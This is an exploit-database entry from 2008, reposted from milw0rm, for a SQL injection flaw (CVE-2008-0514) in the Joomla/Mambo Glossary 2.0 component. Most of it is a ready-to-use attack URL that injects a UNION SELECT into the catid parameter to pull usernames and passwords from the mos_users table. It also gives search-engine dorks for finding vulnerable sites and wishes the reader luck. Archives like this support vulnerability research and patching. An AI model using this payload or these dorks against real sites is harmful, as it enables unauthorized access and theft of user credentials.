Mambo Component Glossary 2.0 catid SQL Injection Vulnerability

2008-01-30T00:00:00
ID EDB-ID:5010
Type exploitdb
Reporter S@BUN
Modified 2008-01-30T00:00:00

Description

Mambo Component Glossary 2.0 (catid) SQL Injection Vulnerability. CVE-2008-0514. Webapps exploit for php platform

                                        
                                            #########################################################################
#
# joomla(Glossary V2.0) SQL Injection(com_glossary)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/

#########################################################################
#
# DorKs 1 : allinurl: "com_glossary"
#
dork 2 : Glossary V2.0 (exploit working html sites)

########################################################################
EXPLOIT :

index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users--

#########################################################################
# S@BUN                 www.hackturkiye.com                S@BUN
#########################################################################
# S@BUN                       GOOD LUCKY                     S@BUN
######################################################################### 

# milw0rm.com [2008-01-30]